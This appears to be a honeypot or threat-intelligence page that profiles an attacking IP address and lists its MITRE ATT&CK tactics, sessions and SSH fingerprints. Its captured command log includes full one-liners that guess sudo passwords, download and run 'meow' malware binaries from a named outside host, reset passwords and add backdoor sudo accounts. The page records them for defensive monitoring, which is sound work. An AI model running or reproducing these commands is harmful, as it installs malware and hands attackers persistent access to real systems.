← Back to feed
35.185.82.208
Location
🇺🇸 US / North Charleston
ASN
AS396982 · Google LLC
Cloud Provider
—
Total Events
192
Above average by volume
Agent Count
1
First / Last Seen
2026-06-01 01:11 — 2026-06-01 01:13
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Defense Evasion
Discovery
Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
Session Forensics
Sessions
13 (4 with login)
Avg Depth Score
0.4
Commands Executed
117
Files Downloaded
4
Notable Commands
- echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):toor > /tmp/mew)
- whoami
- cd /tmp
- ulimit -n 1020000
- rm -rf meow*
- wget http://35.237.91.38/meow
- curl -O http://35.237.91.38/meow
- chmod 777 meow
- ./meow
- echo 'admin123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):admin123 > /tmp/mew)
- echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):server > /tmp/mew)
- echo 'webmaster' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://35.237.91.38/meow; curl -O http://35.237.91.38/meow; chmod 777 meow; ./meow; wget http://35.237.91.38/meowarm64; curl -O http://35.237.91.38/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):webmaster > /tmp/mew)
Download URLs
- http://35.237.91.38/meowarm64
- http://35.237.91.38/meow
Fingerprints
HASSH
SSH Client
Evidence Timeline
Scanner
84812d7436df
15%
Loading events...
SSH-2.0-Go
Interactive Operator
08cfed3029f0
LOGIN
30
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'toor' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Interactive Operator
130bf3e35eba
LOGIN
30
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'admin123' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Malware Dropper
c3bbbe1a6704
LOGIN
30
4
1
100%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'server' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; …$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
http://35.237.91.38/meowarm64http://35.237.91.38/meowarm64http://35.237.91.38/meow
Interactive Operator
a5d165a0bea1
LOGIN
27
1
90%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ echo 'webmaster' | sudo -S sh -c 'cd /tmp; ulimit -n 102000…$ whoami$ whoami$ cd /tmp$ ulimit -n 1020000
Scanner
595a7fd5d3b8
15%
Loading events...